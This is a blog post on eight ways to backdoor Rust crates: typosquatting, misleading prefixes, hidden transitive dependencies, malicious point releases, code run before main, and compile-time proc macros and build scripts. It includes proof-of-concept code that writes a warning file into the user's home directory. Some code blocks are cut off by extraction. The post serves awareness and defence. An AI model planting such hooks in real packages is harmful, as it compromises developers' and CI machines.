Mastodon Backdooring Rust crates for fun and profit

Backdooring Rust crates for fun and profit

Supply chains attacks are all the rage these days, whether to deliver RATs, cryptocurrencies miners, or credential stealers.

In Rust, packages are called crates and are (most of the time) hosted on a central repository: for better discoverability.

We are going to study 8 techniques to achieve Remote Code Execution (RCE) on developers', CI/CD, or users' machines. I voluntarily ignored perniciously backdoored algorithms such as cryptographic primitives or obfuscated code because this is a whole different topic.

The goal of this post is to raise awareness among developers about how easy it’s to carry these kinds of attacks and how pernicious they can be.

Of course, an attacker can combine these techniques to make them more effective and stealthy.

Interested in Security and Rust? Take a look at my book Black Hat Rust



By naming a crate in a very similar way to a popular one, we can expect that a non-zero number of developers will make a typo in the name, either when searching on or when installing the crate.

As an example, I just published the crate num_cpu which targets the num_cpus crate with almost 43,000,000 downloads.

When you look at both crates on, it’s very hard to tell which one is legitimate and which one is malicious.

num_cpu on

Actually, my num_cpu crate has been downloaded 24 times in less than 24 hours, but I’m not sure if it’s by bots or real persons (I didn’t embed any active payload to avoid headaches for anyone involved).

How to know if a crate is legitimate or not?

It’s hard! You can look at the Owners section or the total number of downloads.

But still, this is not perfect: I could have made up my profile in order to look like a famous developer.

Misleading name

All crates on live under a global namespace, which means no organizational scoping.

Thus, organizations, projects, and developers rely on prefixes to make their packages discoverable and group them. tokio-stream or actix-http, for example.

Problem: Anyone can upload a package with a given prefix. For example, I just uploaded the crate tokio-backdoor. While It’s hard to have a more explicit name, imagine if I would have named this crate tokio-workerpool or tokio-future.

By using misleading metadata such as the README, the repository, and tags, an attacker can make this crate appear like an official one.

How to detect these scams?

Again, it’s hard!

Transitive dependencies

By burying a backdoored dependency deep in the dependency tree, an attacker can conceal a backdoored crate.

The chance of a code review of all the transitive dependencies is approximately 0.

For example, let say I want to backdoor a popular crate. I can make a Pull Request with a new dependency, let say tokio-helpers. The trick is that it’s not tokio-helpers that is backdoored, it’s a dependency of a dependency of a … of tokio-helpers.

“x.x.1” Update

By issuing an x.x.1 update, an attacker can compromise all the maintainers relying on cargo update to update their dependencies. From 1.12.0 to 1.12.1 or 0.5.13 to 0.5.14 for example.

Due to how semantic versioning works, a maintainer relying on cargo update to keep their dependencies up to date is going to install the compromised version.

This technique does not necessarily require the cooperation of the crate author. An attacker only needs a token, which could have been stolen from a previous compromise.

How to protect?

By pinning an exact version of a dependency, tokio = "=1.0.0" for example, but then you lose the bug fixes.

Malicious update

A variant of the previous technique is to use the --allow-dirty flag of the cargo publish command.

By doing that, in conjunction with a x.x.1 update, for example, an attacker can publish a crate on without having to commit the code in a public repository.

Where it becomes vicious is that it’s totally possible to make Git tags and versions match while the code is different! There are absolutely no guarantees that the code on matches the code on GitHub, even if the tags and version numbers match!

How to protect?

A method to protect is to vendor your dependencies (with cargo vendor) and carefully audit the diffs for each update.

Run code before main

One of the principles of Rust is no life before main, yet it’s still possible to run code before main by abusing how executables work.

Put in another way, it’s possible to run code without calling it.

It can be done by using the .init_array section on Linux or FreeBSD, __DATA,__mod_init_func section on macOS / iOS and the .ctors or .CRT$XCU sections on Windows.

Here is an example extracted from the startup crate:

macro_rules! on_startup {
    ($($tokens:tt)*) => {
        const _: () = {
            // pulled out and scoped to be unable to see the other defs because
            // of the issues around item-level hygene.
            extern "C" fn __init_function() {
                // Note: currently pointless, since even when loaded at runtime
                // via dlopen, panicing before main makes the stdlib abort.
                // However, if that ever changes in the future, we want to guard
                // against unwinding over an `extern "C"` boundary, so we force
                // a double-panic, which will trigger an abort (rather than have
                // any UB).
                let _guard = $crate::_private::PanicOnDrop;
                // Note: ensure we still forget the guard even if `$tokens` has
                // an explicit `return` in it somewhere.
                let _ = (|| -> () { $($tokens)* })();
                    any(target_os = "macos", target_os = "ios", target_os = "tvos"),
                    link_section = "__DATA,__mod_init_func",
                // These definitely support .init_array
                        target_os = "linux",
                        target_os = "android",
                        target_os = "freebsd",
                        target_os = "netbsd",
                    link_section = ".init_array"
                // Assume all other unixs support .ctors
                    any(unix, all(target_os = "windows", target_env = "gnu")),
                        target_os = "macos", target_os = "ios",
                        target_os = "tvos", target_os = "linux",
                        target_os = "android", target_os = "freebsd",
                        target_os = "netbsd",
                ), link_section = ".ctors")]
                #[cfg_attr(all(windows, not(target_env = "gnu")), link_section = ".CRT$XCU")]
                static __CTOR: extern "C" fn() = __init_function;

Then, we can backdoor a crate like this:

pub fn do_something() {
    println!("do something...");

startup::on_startup! {
    println!("Warning! You just ran a malicious package. Please read for more information.");

Any crate using the backdoored crate is compromised, even if it’s a dependency of a dependency of a …:

fn main() {

Malicious macros

Rust’s macros is code that runs at compile or cargo check time. Can it be abused?

It turns out that yes! The ability to run code at compile time means that any of your dependencies can download malware or exfiltrate files from your computer.

This risk is amplified by the fact that rust-analyzer also expands the macros when loading a project, thus a machine can be compromised just by opening with a code editor (with the rust-analyzer plugin) a folder of a crate whose one of its dependencies is backdoored .

Whether it be a direct or an indirect dependency!

These attacks are particularly juicy for attackers because develpoers' and CI/CD machines (the targets of these attacks) often hold credentials that they can use to pivot or spread more malware.

Here are two examples of malicious macros.

First, an Attribute macro:

use proc_macro::TokenStream;
use std::path::Path;

fn write_warning(file: &str) {
    let home = std::env::var("HOME").unwrap();
    let home = Path::new(&home);
    let warning_file = home.join(file);

    let message = "Warning! You just ran a malicious package. Please read for more information.";
    let _ = std::fs::write(warning_file, message);

pub fn evil_derive(_item: TokenStream) -> TokenStream {


Which once used by a crate is enough to compromise it and all its dependents.

use malicious_macro::Evil;

pub struct RandomStruct {}

Then, a function-like procedural macro:

pub fn evil(_item: TokenStream) -> TokenStream {


Again, if any of your (transitive or not) dependencies call this macro, it’s enough for a compromise at compile-time.

pub fn do_something() {
    println!("do something...");


fn main() {

1 email / week to learn how to (ab)use technology for fun & profit: Programming, Hacking & Entrepreneurship.

Like malicious macros, is run by cargo check and rust-analyzer. Thus, opening with a code editor the folder of a crate that has one of its dependencies backdoored is enough to compromise a machine.

While it’s possible to audit the code of a crate on on clicking on a [src] button, it turns that I couldn’t find a way to inspect files. Thus, combined with a malicious update, it’s the almost perfect backdoor.

It’s actually possible to inspect files on by using the source view:[CRATE]/[VERSION]/source/. Thanks Joshua 🙏

use std::path::Path;

fn main() {
    let home = std::env::var("HOME").unwrap();
    let home = Path::new(&home);
    let warning_file = home.join("WARNING_BUILD");

    let message = "Warning! You just ran a malicious package. Please read for more information.";
    let _ = std::fs::write(warning_file, message);

This technique is less stealth than malicious macros as files are displayed during the compilation process.

Some Closing Thoughts

As Rust is designed for sensitive applications where reliability is important such as embedded, networking or blockchain-like projects, it can raise concerns.

Also, while favoring small and reusable software packages may be philosophically appealing, it has serious practical implications.

Finally, let’s be honest, who has the resources to carefully audit each one of their dependencies (including the transitive ones), for each update?

I see 3 main axes to reduce the impact and the risks associated with these kinds of attacks.

Firstly, a bigger standard library would reduce the need for external dependencies and thus reduce the risk of compromise.

Secondly, Rust supports git dependencies. Using Git dependencies pinned to a commit can prevent some of the techniques mentioned above.

Thirdly, using cloud developer environments such as GitHub Codespaces or Gitpod. By working in sandboxed environments for each project, one can significantly reduce the impact of a compromise.

The code is on GitHub

As usual, you can find the code on GitHub: (please don’t forget to star the repo 🙏).

1 email / week to learn how to (ab)use technology for fun & profit: Programming, Hacking & Entrepreneurship.
I hate spam even more than you do. I'll never share your email, and you can unsubscribe at any time.

Tags: hacking, security, programming, rust, tutorial

Want to learn Rust and offensive security? Take a look at my book Black Hat Rust. All early-access supporters get a special discount and awesome bonuses:
Warning: this offer is limited in time!

Related posts